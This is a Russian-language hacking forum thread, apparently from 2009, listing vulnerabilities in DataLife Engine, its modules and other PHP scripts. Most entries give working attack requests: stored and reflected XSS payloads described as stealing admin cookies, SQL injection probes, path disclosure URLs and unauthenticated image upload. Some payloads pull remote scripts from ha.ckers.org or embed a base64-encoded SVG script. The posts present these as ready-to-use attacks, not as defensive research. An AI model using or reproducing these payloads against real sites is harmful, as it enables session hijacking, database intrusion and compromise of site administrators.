hacking attemptz Версия: v.1.0 Активная XSS от любого пользователя(100% кража куки админа) Уязвимый скрипт: hacking_attemptz_fnct.php Запрос: login_name=<h1><script>alert(/xss/);</script>XSS</h1>&login_password=1234 Метод: POST Уязвимый кусок кода: PHP: function log_user($host) { global $ip; $log_date = date('d.m.Y'); $log_time = date('H:i:s'); $log_info = " <tr> <td align='center'>".$_POST['login_name']."</td> <td align='center'>$log_date</td> <td align='center'>$log_time</td> <td align='center'>$ip</td> <td align='center'>".gethostbyaddr($ip)."</td> </hr> "; Теперь попробуйте залогиниться с логином <h1>xss</h1> и любым пассом! Смотрим админку, и вот! XSS видна
Friends of Suite Версия: v.1.3 Расскрытие путей Уязвимый скрипт: inc/friend.php Запрос: reg_name[]=123®_adress[]=1234 Метод: POST Уязвимый кусок кода: PHP: if ($_POST['docreate'] == "create") { $name = trim(htmlspecialchars(stripslashes($_POST['name']))); $address = trim(htmlspecialchars(stripslashes($_POST['address'])));
Friends of Suite Версия: v.1.3 Активная XSS от любого пользователя(100% кража куки админа) Уязвимый скрипт: friend.php Запрос: reg_name=<h1><script>alert(/xss/);</script>XSS</h1>®_adress=http://127.0.0.1/ Метод: POST Уязвимый кусок кода: PHP: //пока ненашёл... Теперь попробуйте добавить сайт с названием <h1>xss</h1> и любым url'ом где есть ссылка на ваш хост. Смотрим админку, и вот! XSS видна Хотя script удаляет...
DataLife Engine Redirect Версия: v.1.1 XSS Уязвимый скрипт: engine/redirect.php Запрос: url=http://site.su"><script>alert(document.cookie);</script> Метод: GET Уязвимый кусок кода: PHP: $url = (isset($_GET['url']) && (!empty($_GET['url']))) ? trim($_GET['url']) : @header('Location: /index.php'); Переадресация для ссылок(^^ странно похожи...)! Версия: v.1.0 XSS Уязвимый скрипт: engine/redikt.php Запрос: ?url=http://sasa.su"><script>alert(document.cookie);</script> Метод: GET Уязвимый кусок кода: PHP: $url = (isset($_GET['url']) && (!empty($_GET['url']))) ? trim($_GET['url']) : @header('Location: /index.php');
Удаление комментариев при помощи AJAX Версия: v.1.0 sql-inj Уязвимый скрипт: engine/ajax/commentdelete.php Запрос: commid=-1' Метод: GET Уязвимый кусок кода: PHP: $row = $db->super_query("SELECT * FROM " . PREFIX . "_comments where id = '{$_REQUEST['commid']}'"); Раскручивать не стал...
По адресу site/engine/images.php?area= Можно заливать картинки на сервер без авторизации Проверял на 6.7 - пашет
Расскажите можна будет,как нибудь заюзать уязвимость в модуле "Переходы"...? Когда например в гугле воодишь запрос с ковычкой, то при переходе : MySQL Error! The Error returned was: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'vBulletin', '/', '%main%', 'ip', 'engine')' at line 1 Error Number: 1064
там варка в том, что он сохраняет запросы в базу с реферор от гугла или же яши, а если подделать запрос, то можно вызвать скуль эрор, я уже об этом поднимал тему один раз.
Активные XSS в DLE версии 8.0 (возможно и раньше). Необходимо несколько специфических настроек. 1) XSS при добавлении новостей из админски, WISYWIG должен быть отключен; Простое добавление новостей пользователями, WISYWIG должен быть отключен: Code: <iframe width=0 border=0 height=0 src=http://ha.ckers.org/scriptlet.html < Code: <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> Code: <SCRIPT SRC=http://ha.ckers.org/xss.js? < 2) XSS в комментариях к новостям, WISYWIG должен быть включен: Code: <SCRIPT SRC=http://ha.ckers.org/xss.js?< (с) by Wildshaman, 2009 год.
DLE 8.0 Раскрытие путей: Code: http://dle-news.ru/index.php?do=pm&doaction=del&dle_allow_hash=06e5bbf84191c990867ee5bbacf879b8&master_box=on&selected_pm[][]=8 dle_allow_hash берется из исходника страницы списка персональных сообщений (для каждого юзверя он свой на каждом сайте)... Активная XSS (требуется доступ в админку)... идем в редиактирвоание своей инфы в админке ([site]/admin.php?mod=options&action=personal) , в поле "Полное имя:" пишем Code: <script>alert(/Hacked by Wildshaman/)</script> и смотрим в свой профиль на сайте ([site]/user/username) (с)Wildshaman 2009 год
Ет коряво и не работает, т.к. к адресу скрипта коннектится "<" и следующий тег, да и полстраницы обрезается... Если в другю сторону загнуть - фильтрует. З.Ы. Такая же "уязвимость" и в приватных месагах.
Вот тоже нашел xxs, может и баян ну на нулёных версиях пашет как колхозник =) [XSS] Code: http://test1.ru/dle/<script>alert()</script>?mod=main Вот еще раскрытие путей если админ не удалил папку Upgrade, достаточно перейти по адресу: Code: http://test1.ru/dle/upgrade/7.5.php
Создадим новость и потом откроем код страницы с новостью то получим адресс одминки xD Code: <a onclick="return dropdownmenu(this, event, MenuNewsBuild('1', 'full'), '170px')" href="http://site.ru/odmin.php?mod=editnews&action=editnews&id=1" target = "_blank" > Работает не всегда, смотря от настроек DLE.
Уязвимость в скрипте: DLE FORUM. Версии: хз, тестил на 2.3. Что делает: получение префикса таблиц(dle_ или то, что задал админ, например, blablabla_). Реализация: добавить сообщение, содержащее тег а затем, не обновляя страницу, добавить еще одно сообщение. Появится ошибка синтаксиса мускула, при этом откроется, какую именно таблицу не удалось обновить.